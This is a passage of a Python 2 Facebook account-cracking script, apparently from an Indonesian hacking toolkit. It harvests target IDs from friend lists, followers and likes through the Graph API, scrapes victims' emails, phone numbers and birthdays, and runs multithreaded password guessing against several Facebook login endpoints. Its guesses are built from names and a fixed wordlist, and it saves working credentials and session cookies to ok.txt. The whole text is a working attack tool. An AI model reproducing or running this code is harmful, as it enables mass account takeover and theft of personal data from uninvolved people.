    print("\033[0;96m"+50*"-")
    try:
        idt = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID TARGET: ")
        r = requests.get('https://graph.facebook.com/'+idt+'/?access_token='+toket)
        z = json.loads(r.text)
        nama = z['first_name']
        # candidates written: "<name>123" and "<name>123456"
        hasil = open("pass.txt", "w")
        hasil.write(nama+"123\n"+nama+"123456"+"""
""")
        hasil.close()
    except Exception as e:
        exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Error: %s' % e)
### ID Friendslist/Public ###
def publik():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
z = json.loads(r.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
id.append(idne+'<=>'+jenenge)
except KeyError:
exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pertemanan Tidak Ada!')
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### ID Dari Followers ###
def followers():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=20000&access_token="+toket)
z = json.loads(r.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
id.append(idne+'<=>'+jenenge)
except KeyError:
exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User Followers Tidak Ada!')
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### Krek ID Massal ##
def dekura___sayang___ara():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
iduo = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
z = json.loads(r.text)
k = requests.get('https://graph.facebook.com/'+iduo+'/friends?access_token='+toket)
j = json.loads(k.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
for x in j['data']:
iduoo = x['id']
jenengeee = x["name"]
kntl = (idne + iduoo)
jmbd = (jenengeee + jenenge)
id.append(kntl+'<=>'+jmbd)
except KeyError:
print "kntl"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### ID Dari Likes ###
def likes():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r=requests.get("https://graph.facebook.com/"+idt+"/likes?limit=100000&access_token="+toket)
z = json.loads(r.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
id.append(idne+'<=>'+jenenge)
except KeyError:
exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User Like Tidak Ada!')
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### Check Info Target ###
def infotarget():
try:
toket = open('___dekura___sayang___ara___','r').read()
except IQError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
try:
checkt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m•\x1b[1;37m] ID Target: ')
jemudd = requests.get('https://graph.facebook.com/'+checkt+'?access_token=%s'%(toket))
kntl = json.loads(jemudd.text)
fol = requests.get('https://graph.facebook.com/'+checkt+'/subscribers?access_token=%s'%(toket))
pol = json.loads(fol.text)
batir = requests.get('https://graph.facebook.com/'+checkt+'/friends?access_token='+toket)
batirecheck = json.loads(batir.text)
idne = batirecheck['id']
id.append(idne)
nick = kntl['name']
except KeyError:
nick = "Tidak Di Temukan "
except: pass
try:
depan = kntl['frist_name']
except KeyError:
depan = "Tidak Di Temukan "
except: pass
try:
tengah = kntl['middle_name']
except KeyError:
tengah = "Tidak Di Temukan "
except: pass
try:
blngkg = kntl['last_name']
except KeyError:
blngkg = "Tidak Di Temukan "
except: pass
try:
email = kntl['email']
except KeyError:
email = "Tidak Di Temukan "
except: pass
try:
nomor = kntl['phone']
except KeyError:
nomor = "Tidak Di Temukan "
except: pass
try:
sekolah = kntl['school']
except KeyError:
sekolah = "Tidak Di Temukan "
except: pass
try:
jenis = kntl['gender']
except KeyError:
jenis = "Tidak Di Temukan "
except: pass
try:
lokasi = kntl['location']['name']
except KeyError:
lokasi = "Tidak Di Temukan "
except: pass
try:
followers = pol['summary']['total_count']
except KeyError:
followers = "Tidak Di Temukan"
except: pass
try:
tinggal = kntl['hometown']['name']
except KeyError:
tinggal = "Tidak Di Temukan "
except: pass
try:
ttl = kntl['birthday']
except KeyError:
ttl = "Tidak Di Temukan "
except: pass
# try:
# hobi = kntl['profession']
# except KeyError:
# hobi = "Tidak Di Temukan "
# except: pass
print (" Nick : %s"%nick)
#print (" Nama Depan : %s"%depan)
#print (" Nama Belakang: %s"%tengah)
print (" School : %s"%sekolah)
print (" Gender : %s"%jenis)
print (" Location : %s"%lokasi)
print (" Mobile Phone : %s"%nomor)
print (" Email : %s"%email)
print (" Friendslist : %s"%(str(len(id))))
print (" Followers : %s"%followers)
print (" HomeTown : %s"%tinggal)
print (" Birthday : %s"%ttl)
#print (" Hobby : %s"%hobi)
### Methode Cracknya ###
def dekura_x():
print '\n\x1b[0;97m [ \x1b[1;36mPilih Metode crack\x1b[1;37m ]'
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m1\x1b[1;37m] Crack With Api.Facebook (%sFast crack%s)'%(o,p)
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m2\x1b[1;37m] Crack With Mbasic.Facebook (%sRecommended crack%s)'%(o,p)
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m3\x1b[1;37m] Crack With Touch.Facebook '
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m3\x1b[1;37m] Crack With M.Facebook '
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m5\x1b[1;37m] Crack With Free.Facebook '
print ''
dekurasayangara = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Choose: ")
if dekurasayangara == "":
menu()
elif dekurasayangara == "1":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(api, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(api, uid, dekura)
hasil()
elif dekurasayangara == "2":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasic, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=35) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(mbasic, uid, dekura)
hasil()
elif dekurasayangara == "3":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(touch, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(touch, uid, dekura)
hasil()
else:
exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!")
elif dekurasayangara == "4":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(mfacebook, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(mfacebook, uid, dekura)
hasil()
else:
exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!")
elif dekurasayangara == "5":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(freefb, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(freefb, uid, dekura)
hasil()
else:
exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!")
else:
menu()
### Api Fast Crack ###
def api(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
pw = pw.lower()
ses = requests.Session()
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
send = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers_)
if "session_key" in send.text and "EAAA" in send.text:
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, send.json()["access_token"]))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "www.facebook.com" in send.json()["error_msg"]:
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack ###
def mbasic(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack ###
def touch(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://touch.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "touch.facebook.com", "referer": "https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://touch.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://touch.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Ftouch.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack ###
def mfacebook(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com/login/?next&ref=dbl&fl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack Kalo Hoki Dapat Ok ###
def freefb(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://free.facebook.com/login/?next&ref=dbl&fl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
